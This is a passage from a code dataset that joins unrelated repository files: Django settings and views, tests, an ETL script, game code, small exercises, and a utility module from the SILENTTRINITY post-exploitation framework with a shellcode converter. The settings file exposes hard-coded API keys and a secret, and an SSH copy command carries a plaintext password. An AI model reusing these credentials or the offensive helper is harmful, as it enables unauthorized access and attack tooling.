'allauth.account.auth_backends.AuthenticationBackend',\n)\n\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'pingismo.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'pingismo.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n # 'django.contrib.admindocs',\n 'base',\n\n # allauth\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n # 'south',\n 'rest_framework',\n 'rest_framework.authtoken',\n\n 'bucketlist',\n)\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n# Directories. Use relative path to this file instead of absolute path\nPROJECT_DIR = Path(__file__).ancestor(3)\nADMIN_MEDIA_PREFIX = ''\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = PROJECT_DIR.child('media')\n\n# URL that handles the media served from MEDIA_ROOT. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = PROJECT_DIR.child('static_collected')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n    PROJECT_DIR.ancestor(1).child('static'),\n)\nTEMPLATE_DIRS = (\n    # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n    # Always use forward slashes, even on Windows.\n    # Don't forget to use absolute paths, not relative paths.\n    PROJECT_DIR.child('templates'),\n)\n\nDATABASES = {'default': dj_database_url.config()}\nALLOWED_HOSTS = ['houz.tw', '127.0.0.1', 'localhost']\nSESSION_COOKIE_HTTPONLY = False\n\n# allauth configurations\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_USERNAME_REQUIRED = False\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_USER_MODEL_USERNAME_FIELD = None\nACCOUNT_USER_MODEL_EMAIL_FIELD = 'email'\nACCOUNT_LOGOUT_ON_GET = True\nACCOUNT_SIGNUP_FORM_CLASS = 'base.forms.SignupForm'\n\nGOOGLE_API_KEY = 'AIzaSyBKs2cUeB6GGVbksMr7bTOzfBK6rrAX_kg'\nUSERVOICE_API_KEY = 'OQImMizYBSftVKBeEEWuBA'\nUSERVOICE_API_SECRET = 'Op56l4akyiqo4IXnEXDJFXqFGwDWIN0jO8tM9swty9w'\n\nLOGIN_REDIRECT_URL = '/'\n\n# EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n# Django REST Framework\nAPPEND_SLASH = False\nREST_FRAMEWORK = {\n    'DEFAULT_AUTHENTICATION_CLASSES': (\n        # 'rest_framework.authentication.BasicAuthentication',\n        'rest_framework.authentication.SessionAuthentication',\n        'rest_framework.authentication.TokenAuthentication',\n    )\n}\n","repo_name":"MappingBird/web-application","sub_path":"src/django/pingismo/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42111147344","text":"from dataclasses import dataclass\nfrom typing import Tuple\n\nfrom hologram import JsonSchemaMixin\n\n\n@dataclass\nclass TupleMember(JsonSchemaMixin):\n    a: int\n\n\n@dataclass\nclass TupleEllipsisHolder(JsonSchemaMixin):\n    member: Tuple[TupleMember, ...]\n\n\n@dataclass\nclass TupleMemberFirstHolder(JsonSchemaMixin):\n    member: Tuple[TupleMember, str]\n\n\n@dataclass\nclass TupleMemberSecondHolder(JsonSchemaMixin):\n    member: Tuple[str, TupleMember]\n\n\ndef test_ellipsis_tuples():\n    dct = {\"member\": [{\"a\": 1}, {\"a\": 2}, {\"a\": 3}]}\n    value = TupleEllipsisHolder(\n        member=(TupleMember(1), TupleMember(2), TupleMember(3))\n    )\n    assert value.to_dict() == dct\n    assert TupleEllipsisHolder.from_dict(dct) == value\n\n\ndef test_member_first_tuple():\n    dct = {\"member\": [{\"a\": 1}, \"a\"]}\n    value = TupleMemberFirstHolder(member=(TupleMember(1), \"a\"))\n    assert TupleMemberFirstHolder.from_dict(dct) == value\n    assert value.to_dict() == dct\n\n\ndef test_member_second_tuple():\n    dct = {\"member\": [\"a\", {\"a\": 1}]}\n    value = TupleMemberSecondHolder(member=(\"a\", TupleMember(1)))\n    assert TupleMemberSecondHolder.from_dict(dct) == value\n    assert value.to_dict() == 
dct\n","repo_name":"dbt-labs/hologram","sub_path":"tests/test_tuple.py","file_name":"test_tuple.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"38290677468","text":"import json\nfrom os import environ\nfrom time import sleep\nfrom sqlalchemy import create_engine, Column, String, Table, func\nfrom sqlalchemy.exc import OperationalError\nfrom sqlalchemy.orm import sessionmaker, declarative_base\nimport pandas as pd\nfrom geopy import distance\n\nprint('Waiting for the data generator...')\nsleep(20)\nprint('ETL Starting...')\n\nwhile True:\n try:\n psql_engine = create_engine(environ[\"POSTGRESQL_CS\"], pool_pre_ping=True, pool_size=10)\n break\n except OperationalError:\n sleep(0.1)\nprint('Connection to PostgresSQL successful.')\n\n# Write the solution here\n\nBase = declarative_base()\n\n\n# Extract and Auto loads devices table in Device Object\nclass Device(Base):\n __table__ = Table(\"devices\", Base.metadata, autoload_with=psql_engine)\n\n\n# Function to calculate Distance between Two location\ndef calculate_distance(loc1, loc2):\n point1 = json.loads(loc1) # Json loads first location\n point2 = json.loads(loc2) # Json loads second location\n\n # return distance between two data points\n return distance.distance((point1[0]['latitude'], point1[0]['longitude']),\n (point2[0]['latitude'], point2[0]['longitude'])).km\n\n\n# PostgreSQL Database connection\nSession = sessionmaker(bind=psql_engine)\npsql_session = Session()\n\n# ORM Script to Aggregate maximum temperatures measured for every device per hours\nmax_temp_query = psql_session.query(Device.device_id, Device.time.hour.label('Hour'), func.max(Device.temperature)) \\\n .group_by(Device.device_id, Device.time.hour).all()\n\n# Convert into dataframe\nmax_temp_df = pd.read_sql_query(max_temp_query.statement, con=psql_engine)\n\n# ORM Script to Aggregate data points aggregated for every device per hours.\ndata_point_query = psql_session.query(Device.device_id, Device.time.hour.label('Hour'), func.count(1)) \\\n .group_by(Device.device_id, Device.time.hour).all()\n\n# Convert into dataframe\ndata_point_df = pd.read_sql_query(data_point_query.statement, con=psql_engine)\n\n# ORM Script to Partition the dataset based on the Device ID and Time Hour.\ndevice_distance_query = psql_session.query(Device.device_id,\n Device.time.hour.label('Hour'),\n Device.location,\n func.row_number().over(\n partition_by=(Device.device_id, Device.time.hour),\n order_by=Device.time.asc()\n ).label('row_number')\n ).all()\n\n# Convert into dataframe\ndevice_distance_df = pd.read_sql_query(device_distance_query.statement, con=psql_engine)\n\n# Add new Column with default value\ndevice_distance_df = device_distance_df.assign(location2='NULL')\n\n# Assign value of New Column with the previous location of same device to calculate distance.\ndevice_distance_df.loc[0, 'location2'] = device_distance_df.loc[0, 'location']\n\nfor i in range(1, len(device_distance_df)):\n device_distance_df.loc[i, 'C'] = device_distance_df.loc[i - 1, 'C']\n\n\n# Calculate Distance Between Two Locations\ndevice_distance_df['distance'] = device_distance_df.apply(\n lambda x: calculate_distance(x['location'], x['location2']) if x['row_number'] > 1 else 0, axis=1)\n\n\n# Calculate Total distance of device movement for every device per hours\ndevice_distance_df = device_distance_df.groupby(['device_id','Hour'])['distance'].sum()\n\n\n# Connection to the MySQL Database\nwhile True:\n 
try:\n mysql_engine = create_engine(environ[\"MYSQL_CS\"], pool_pre_ping=True, pool_size=10)\n break\n except OperationalError:\n sleep(0.1)\n\nprint('Connection to MySQL successful.')\n\n# MySQL Database Session\nSession = sessionmaker(bind=mysql_engine)\npsql_session = Session()\n\n# Store Aggregated temperature of Device per Hour into MySQL Table\nmax_temp_df.to_sql('device_Hourly_temperature', mysql_engine)\n\n# Store Aggregated datapoints of Device per Hour into MySQL Table\ndata_point_df.to_sql('device_hourly_datapoints', mysql_engine)\n\n# Store Aggregated distance of Device per Hour into MySQL Table\ndevice_distance_df.to_sql('device_hourly_distance', mysql_engine)\n","repo_name":"ashfaqahmad892/PAIR-Finance-Data-Engineering-Task","sub_path":"analytics/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24541810399","text":"import netifaces\nimport random\nimport string\nfrom functools import wraps\nfrom typing import get_type_hints, List\nfrom uuid import UUID\n\nfrom docopt import docopt\nfrom quart import jsonify\nfrom termcolor import colored\n\n\nclass CmdError(Exception):\n pass\n\n\ndef command(func):\n func._command = True\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n cmd_args = docopt(func.__doc__.strip(), argv=kwargs[\"args\"])\n validated_args = {}\n for name, hint in get_type_hints(func).items():\n try:\n value = cmd_args[f'<{name}>']\n except KeyError:\n try:\n value = cmd_args[f'--{name}']\n except KeyError:\n raise CmdError(f\"Unable to find '{name}' argument in command definition\")\n\n try:\n validated_args[name] = hint(value)\n except TypeError:\n # I'm still not sure if there's a way to dynamically cast Lists and Dicts using type hints\n if hint == List[int]:\n validated_args[name] = [int(x) for x in value]\n elif hint == List[str]:\n validated_args[name] = [str(x) for x in value]\n else:\n raise NotImplemented(f\"Casting for type '{hint}' has not been implemented\")\n\n return func(args[0], **validated_args)\n\n return wrapper\n\n\ndef register_cli_commands(cls):\n cls._cmd_registry = []\n for methodname in dir(cls):\n method = getattr(cls, methodname)\n if hasattr(method, '_command'):\n cls._cmd_registry.append(methodname)\n return cls\n\n\ndef check_valid_guid(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n try:\n UUID(kwargs[\"GUID\"])\n except Exception:\n return jsonify({}), 400\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef gen_random_string(length=8):\n return ''.join(random.sample(string.ascii_letters, int(length)))\n\n\ndef get_interfaces():\n return netifaces.interfaces()\n\n\ndef get_ipaddress(interface=None):\n if interface and (interface in get_interfaces()):\n return netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']\n else:\n for iface in netifaces.interfaces():\n try:\n netif = netifaces.ifaddresses(iface)\n if netif[netifaces.AF_INET][0]['addr'] == '127.0.0.1':\n continue\n return netif[netifaces.AF_INET][0]['addr']\n except (ValueError, KeyError):\n continue\n\n return \"\"\n\n\n# https://github.com/zerosum0x0/koadic/blob/master/core/plugin.py\ndef convert_shellcode(shellcode):\n decis = []\n count = 0\n for i in range(0, len(shellcode), 2):\n count += 1\n hexa = shellcode[i:i + 2]\n deci = int(hexa, 16)\n\n if count % 25 == 0:\n decis.append(\" _\\\\n\" + str(deci))\n else:\n decis.append(str(deci))\n\n return \",\".join(decis)\n\n\ndef print_good(msg):\n 
print(f\"{colored('[+]', 'green')} {msg}\")\n\n\ndef print_bad(msg):\n print(f\"{colored('[-]', 'red')} {msg}\")\n\n\ndef print_info(msg):\n print(f\"{colored('[*]', 'blue')} {msg}\")\n\n\ndef print_banner(codename, version):\n logo = \"\"\"\n ........ \n .':ldxkkkkkxdoc,. \n .cdOOOOOOOOOOOOOOOxl,. \n .ckOOOOOOOOOOOOOOOOOOOko' \n .dOOOOOOOOOOOOOOOOOOOOOOOx; \n .oOOOOOOOOOOOOOOOOOOOOOOOOOx, \n :OOOOOOOOOOOOOOOOOOOOOOOOOOOo. \n .lOOOOxoccldOOOOOOOxoccldkOOOd' \n cOOkc'.,,..;xOOOkc'.,;..;dOOd. \n ,kOl.'cccl;.;kOOl.'cccl;.;kOc. \n .cOl..:cc:'.:kOOo..:cc:,.:kd. \n .oko,.''.'cxl;cdo,.',.'cxx, \n .oOOxoodkOd;',lOOxoodkOx, \n .oOxdocc:;;;;;::cloxkx, \n .'. .'. \n ....... ....... \n ..;:looddxxkkk; .''. .dkkxxdddolc;'. \n 'cdkOOxc;,,,cdOOo. 'dOk: :OOxl;,,,:dOOOxl,. \n .lkOOOOd'.;::;'.lOO: .cOd. ,xOx,.,::;'.lOOOOOd, \n ,xOOOOOOc.;o:;o: ;kkx; ;oc. 'okOl.,oc;oc.,kOOOOOkc. \n ,xOOOOOOOd,.,;;,..ox;,l:. 'l;,ox,.,;;;'.lOOOOOOOOc. \n .oOOOOOOOOOkl;,,;cxOdc:okl. .:xdc:oOkl;,,;cdOOOOOOOOOk, \n ,xOOOOOOOOOOOOOOOkdc;;:okOx:. ,okkdc:;:okOOOOOOOOOOOOOOOOc \n ,kOOOOOOOOOOOOOOx;.';;'.,dOOd:. 'okOx:..;;'.'oOOOOOOOOOOOOOOOc \n .dOOOOOOOOOOOOOOc.,oc:o: ;kOkc. ,xOOl.,oc;o:.,kOOOOOOOOOOOOOk; \n ;kOOOOOOOOOOOOOo..;cc:'.cOx; .oOd..;cc:'.cOOOOOOOOOOOOOOl. \n .:kOOOOOOOOOOOOOd;',,',oko. .cxd:',,',lkOOOOOOOOOOOOOo. \n ,dOOOOOOOOOOOOOOkxxkOx;. 'okkxxkOOOOOOOOOOOOOOx:. \n .;okOOOOOOOOOOOOOkd:. .,lxOOOOOOOOOOOOOkd:. \n .,cldxxkkxdoc;. .,cldxxkkxdoc;'. \n ...... ...... \n \"\"\"\n banner = \"\"\"\n _____ ______ _______ __________________ _____ ______________ __\n / ___// _/ / / ____/ | / /_ __/_ __/ __ \\/ _/ | / / _/_ __/\\ \\/ /\n \\__ \\ / // / / __/ / |/ / / / / / / /_/ // // |/ // / / / \\ /\n ___/ // // /___/ /___/ /| / / / / / / _, _// // /| // / / / / /\n /____/___/_____/_____/_/ |_/ /_/ /_/ /_/ |_/___/_/ |_/___/ /_/ /_/\n \"\"\"\n version = f\"\"\"\n Codename : {colored(codename, \"green\")}\n Version : {colored(version, \"green\")}\n \"\"\"\n\n print(colored(logo, \"green\"))\n print(colored(banner, \"white\"))\n print(version)\n","repo_name":"orf53975/SILENTTRINITY","sub_path":"Server/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6604920059","text":"from fabric import Connection, Config\nimport time\nfrom multiprocessing import Process\nimport subprocess\n\ndef timing(connection):\n connection.run('uhd_rx_cfile -f 3555e6 --lo-offset=1.2M -N 10000 power1')\n connection.run('iq_to_power.py -p ~/power1 -w 5000 -n db_power1')\n subprocess.call('pscp -pw kirby -scp alliet@pc817.emulab.net:~/db_power1.csv ustar_test1.csv')\n return\n\ndef transmit(connection):\n print('start transmit:')\n connection.run('uhd_siggen_45sec --const --freq 3555e6 --amplitude 1 --gain 31.5 -v')\n print('end transmit!')\n\n\nif __name__ =='__main__':\n transmit_ssh = Connection(host='pc785.emulab.net', user='alliet',\n connect_kwargs={'key_filename': '/Users/allis/Powder/paramiko/id_rsa'})\n recieve_ssh = Connection(host='pc817.emulab.net', user='alliet',\n connect_kwargs={'key_filename': '/Users/allis/Powder/paramiko/id_rsa'})\n p1 = Process(target = transmit, args = (transmit_ssh,))\n\n p2 = Process(target = timing, args = (recieve_ssh,))\n\n p1.start()\n time.sleep(30)\n 
p2.start()\n","repo_name":"jiewang-web/powder-summer20","sub_path":"tutorials/collect-power-weather/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70382391555","text":"from server.core.db.databases import Color_db\n\n\ndef get_user_nickname(user_email: str):\n user_col = Color_db().get_user_col()\n user = user_col.find_one({\"_id\": user_email})\n nickname = user[\"nickname\"]\n\n return nickname\n\n\ndef delete_user(user_email: str):\n db = Color_db()\n user_col = db.get_user_col()\n post_col = db.get_post_col()\n\n user_col.delete_one({\"_id\": user_email})\n post_col.delete_many({\"userEmail\": user_email})\n","repo_name":"GRAM-DSM/Color-Backend-FastAPI","sub_path":"server/utils/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20460047376","text":"from collections import namedtuple\nfrom protocolbuffers.DistributorOps_pb2 import Operation\nimport protocolbuffers\nfrom distributor.ops import Op, RelationshipUpdate\nfrom distributor.system import Distributor\nfrom sims4.repr_utils import standard_repr\nimport services\nimport sims4.log\nlogger = sims4.log.Logger('DistributorMessages')\n\nclass MessageOp(Op):\n __qualname__ = 'MessageOp'\n\n def __init__(self, protocol_buffer, message_type, immediate=False):\n super().__init__(immediate=immediate)\n self.protocol_buffer = protocol_buffer\n self.message_type = message_type\n\n def __repr__(self):\n return standard_repr(self, self.message_type)\n\n def write(self, msg):\n msg.type = Operation.UI_UPDATE\n msg.data = self.protocol_buffer.SerializeToString()\n msg.data_context = self.message_type\n\ndef add_message_if_selectable(sim, msg_id, msg, immediate):\n if sim.is_selectable and sim.valid_for_distribution:\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(sim, op)\n\ndef add_message_if_player_controlled_sim(sim, msg_id, msg, immediate):\n if not sim.is_npc and sim.valid_for_distribution:\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(sim, op)\n\ndef add_object_message(obj, msg_id, msg, immediate):\n distributor = Distributor.instance()\n op = MessageOp(msg, msg_id, immediate)\n distributor.add_op(obj, op)\n\ndef add_object_message_for_sim_id(sim_id, msg_id, msg):\n sim_info = services.sim_info_manager().get(sim_id)\n if sim_info is not None:\n add_object_message(sim_info, msg_id, msg, False)\n else:\n logger.error('Unable to find Sim for id {} in add_object_message_for_sim_id', sim_id)\n\n_IconInfoData = namedtuple('IconInfoData', ('icon_resource', 'obj_instance', 'obj_def_id', 'obj_geo_hash', 'obj_material_hash'))\n\ndef IconInfoData(icon_resource=None, obj_instance=None, obj_def_id=None, obj_geo_hash=None, obj_material_hash=None):\n return _IconInfoData(icon_resource, obj_instance, obj_def_id, obj_geo_hash, obj_material_hash)\n\nEMPTY_ICON_INFO_DATA = IconInfoData()\n\ndef build_icon_info_msg(icon_info, name, msg):\n if name is not None:\n msg.name = name\n icon = icon_info[0]\n if icon is not None:\n msg.icon.type = icon.type\n msg.icon.group = icon.group\n msg.icon.instance = icon.instance\n else:\n msg.icon.type = 0\n msg.icon.group = 0\n msg.icon.instance = 0\n icon_object = icon_info[1]\n if icon_object is not None:\n (msg.icon_object.object_id, 
msg.icon_object.manager_id) = icon_object.icon_info\n msg.object_instance_id = icon_object.id\n icon_object.populate_icon_canvas_texture_info(msg)\n if len(icon_info) > 2:\n icon_info_data = icon_info\n else:\n icon_info_data = icon_object.get_icon_info_data()\n else:\n icon_info_data = icon_info\n tuple_length = len(icon_info_data)\n icon_obj_def_id = icon_info_data[2] if tuple_length > 2 else None\n icon_obj_geo_hash = icon_info_data[3] if tuple_length > 3 else None\n icon_obj_material_hash = icon_info_data[4] if tuple_length > 4 else None\n if icon_obj_def_id is not None:\n msg.icon_object_def.definition_id = icon_obj_def_id\n if icon_obj_geo_hash is not None:\n msg.icon_object_def.geo_state_hash = icon_obj_geo_hash\n if icon_obj_material_hash is not None:\n msg.icon_object_def.material_hash = icon_obj_material_hash\n\ndef create_icon_info_msg(icon_info, name=None):\n icon_info_msg = protocolbuffers.UI_pb2.IconInfo()\n build_icon_info_msg(icon_info, name, icon_info_msg)\n return icon_info_msg\n\ndef create_message_op(msg, notification_type):\n return MessageOp(msg, notification_type)\n\ndef send_relationship_op(sim_info, message):\n distributor = Distributor.instance()\n op = RelationshipUpdate(message)\n distributor.add_op(sim_info, op)\n\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"simulation/distributor/shared_messages.py","file_name":"shared_messages.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"4729285208","text":"# 导入数据模型ArticlePost\nfrom .models import ArticlePost\n# 引入markdown模块\nimport markdown\n# 引入redirect重定向模块\nfrom django.shortcuts import render, redirect\nfrom .forms import ArticlePostForm\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\n# 分页模块\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\n#引入Q对象,搜索用\nfrom django.db.models import Q\nfrom comment.models import Comment\n# 引入评论表单\nfrom comment.forms import CommentForm\n\n\n\n# 文章列表\ndef article_list(request):\n # 从 url 中提取查询参数\n search = request.GET.get('search')\n order = request.GET.get('order')\n column = request.GET.get('column')\n tag = request.GET.get('tag')\n\n # 初始化查询集\n article_list = ArticlePost.objects.all()\n\n # 搜索查询集\n if search:\n article_list = article_list.filter(\n Q(title__icontains=search) |\n Q(body__icontains=search)\n )\n else:\n # 将 search 参数重置为空\n search = ''\n\n # 栏目查询集\n if column is not None and column.isdigit():\n article_list = article_list.filter(column=column)\n\n # 标签查询集\n if tag and tag != 'None':\n article_list = article_list.filter(tags__name__in=[tag])\n\n # 查询集排序\n if order == 'total_views':\n # 按热度排序博文\n article_list = article_list.order_by('-total_views')\n\n # 每页显示 1 篇文章\n paginator = Paginator(article_list, 2)\n # 获取 url 中的页码\n page = request.GET.get('page')\n # 将导航对象相应的页码内容返回给 articles\n articles = paginator.get_page(page)\n # 需要传递给模板(templates)的对象\n context = {\n 'articles': articles,\n 'order': order,\n 'search': search,\n 'column': column,\n 'tag': tag,\n }\n # render函数:载入模板,并返回context对象\n return render(request, 'article/list.html', context)\n\n# 文章详情\ndef article_detail(request, id):\n article = ArticlePost.objects.get(id=id)\n # 取出文章评论\n comments = Comment.objects.filter(article=id)\n # 浏览量\n article.total_views += 1\n article.save(update_fields=['total_views'])\n # 引入评论表单\n comment_form = CommentForm()\n\n # 修改 Markdown 语法渲染\n md = markdown.Markdown(\n extensions=[\n 
'markdown.extensions.extra',\n            'markdown.extensions.codehilite',\n            'markdown.extensions.toc',\n        ]\n    )\n    article.body = md.convert(article.body)\n\n    # 新增了md.toc对象\n    context = { 'article': article,\n                'toc': md.toc,\n                'comments': comments,\n                'comment_form': comment_form,\n                }\n    return render(request, 'article/detail.html', context)\n\n# 写文章的视图\ndef article_create(request):\n    # 判断用户是否提交数据\n    if request.method == \"POST\":\n\n        # 将提交的数据赋值到表单实例中\n        article_post_form = ArticlePostForm(request.POST, request.FILES)#第二个参数为新加和图片有关\n        # 判断提交的数据是否满足模型的要求\n        if article_post_form.is_valid():\n            # 保存数据,但暂时不提交到数据库中\n            new_article = article_post_form.save(commit=False)\n            # 指定目前登录的用户为作者\n            new_article.author = User.objects.get(id=request.user.id)\n            # 将新文章保存到数据库中\n            new_article.save()\n            # 完成后返回到文章列表\n            return redirect(\"article:article_list\") # 反转,应用命名空间\n        # 如果数据不合法,返回错误信息\n        else:\n            return HttpResponse(\"漏填或填写错误,请返回重新填写。\")\n    # 如果用户请求获取数据\n    else:\n        # 创建表单类实例\n        article_post_form = ArticlePostForm()\n        # 赋值上下文\n        context = { 'article_post_form': article_post_form }\n        # 返回模板\n        return render(request, 'article/create.html', context)\n\n# 删文章\ndef article_delete(request, id):\n    # 根据 id 获取需要删除的文章\n    article = ArticlePost.objects.get(id=id)\n    # 调用.delete()方法删除文章\n    article.delete()\n    # 完成删除后返回文章列表\n    return redirect(\"article:article_list\")\n\n# 更新文章是在原有的基础上\n# 提醒用户登录\n@login_required(login_url='/userprofile/login/')\ndef article_update(request, id):\n    # 获取需要修改的具体文章对象\n    article = ArticlePost.objects.get(id=id)\n    # 不是作者不能修改\n    if request.user != article.author:\n        return HttpResponse(\"抱歉,你无权修改这篇文章。\")\n\n    # 判断用户是否为 POST 提交表单数据\n    if request.method == \"POST\":\n        # 将提交的数据赋值到表单实例中\n        article_post_form = ArticlePostForm(data=request.POST)\n        # 判断提交的数据是否满足模型的要求\n        if article_post_form.is_valid():\n            # 保存新写入的 title、body 数据并保存\n            article.title = request.POST['title']\n            article.body = request.POST['body']\n            article.save()\n            # 完成后返回到修改后的文章中。需传入文章的 id 值\n            return redirect(\"article:article_detail\", id=id)\n        # 如果数据不合法,返回错误信息\n        else:\n            return HttpResponse(\"表单内容有误,请重新填写。\")\n\n    # 如果用户 GET 请求获取数据\n    else:\n        # 创建表单类实例\n        article_post_form = ArticlePostForm()\n        # 赋值上下文,将 article 文章对象也传递进去,以便提取旧的内容\n        context = { 'article': article, 'article_post_form': article_post_form }\n        # 将响应返回到模板中\n        return render(request, 'article/update.html', context)","repo_name":"aeastern/BLOG","sub_path":"my_blog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41263945164","text":"import itertools\n\nfirst = [int(i) for i in input().split()]\nsecond = [int(i) for i in input().split()]\nall_comb = [(i[0], i[1], j[0], j[1]) for i in list(itertools.permutations(first))\n            for j in list(itertools.permutations(second))]\nfor comb in all_comb:\n    if comb[1] == comb[2]:\n        print(*comb)\n        break\nelse:\n    print(-1)\n","repo_name":"Pavel-Bylkov/lessons","sub_path":"codo/Zadachi/tk_domino.py","file_name":"tk_domino.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20632850288","text":"from django.urls import path\nfrom .import views \n\n\nurlpatterns = [\n    \n    path('all_stores',views.stores_view ,name= 'stores'),\n    path('add_stores/',views.add_stores ,name= 'add_stores'),\n    path('edit_stores///', views.edit_stores ,name= 'edit_stores'),\n    path('delete_stores///', views.delete_store ,name= 'delete_stores'),\n    
\n]","repo_name":"lamiaah/tagry","sub_path":"stores/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71589581953","text":"# Assignment Number...: 10\n# Student Name........: 양서윤\n# File Name...........: hw10_양서윤\n# Program Description.: 파일을 열고 자료를 처리하는 법을 익힌다.\n\n\nfrom collections import defaultdict\ndd = defaultdict(list)\nsubway_data = []\nHeaderList = []\n# collections 모듈에서 defaultdict를 불러온다.\n# defaultdict는 k라는 키에 접근하려 했을 떄 만약 k라는 키가 딕셔너리에 없을 경우\n# k를 키로 가지고 디폴트 값으로 y를 가지는 새로운 항목을 생성한다.\n# 디폴트 값을 리스트로 설정한 디폴트 딕셔너리 dd를 생성한다.\n# 빈 리스트 subway_data를 생성한다.\n# 각 열의 첫째 데이터를 따로 저장하기 위해 빈 리스트 HeaderList를 생성한다.\n\n\nf = open('subway.txt', mode='r', encoding='utf-8-sig')\nlines = f.read().splitlines()\nf.close()\n# open 함수를 사용해 텍스트 파일을 읽는다. 읽기 작업을 위해 mode는 r로, 인코딩은 utf-8-sig로 설정하고 f 변수에 할당했다.\n# 파일의 데이터를 read 함수로 읽고, 각 줄의 마지막에 새줄바꿈 없이 줄 단위로 나눈 후\n# 리스트 형식으로 반환하는 splitlines 함수를 사용하여 변수 lines에 할당했다.\n# lines 변수를 정의한 후 close 함수로 주어진 파일을 닫았다.\n\n\nfor i, line in enumerate(lines):\n line = line.split(',')\n\n if i == 0:\n for i in range(len(line)):\n HeaderList.append(line[i])\n continue\n\n row = dict(zip(HeaderList, line))\n subway_data.append(row)\n\nprint(subway_data)\n# 데이터의 각 줄을 탐색하기 위해 for문을 사용했다.\n# (인덱스, 항목)의 튜플을 제공하는 enumerate 함수를 사용해 각 줄에 인덱스를 부여했다.\n# 각 줄의 항목 사이 구분이 ','로 되어 있기에, ','를 기준으로 분리하기 위해 구분자를 ','로 지정한 split 함수를 사용했다.\n# 첫번째 줄을 헤더로 지정하기 위해, if 문을 사용해 첫번째 줄을 불러냈다.\n# for 문과 range 함수를 사용해 첫번째 줄의 요소 개수만큼 루프문을 돌려, append 함수를 사용하여 요소를 하나씩 HeaderList에 추가했다.\n# 헤더를 만들었으면, 순환문의 첫 명령문으로 되돌아가 다음 반복을 진행하기 위해 continue 명령어를 사용했다.\n# 각 줄에 대해 HeaderList와 각 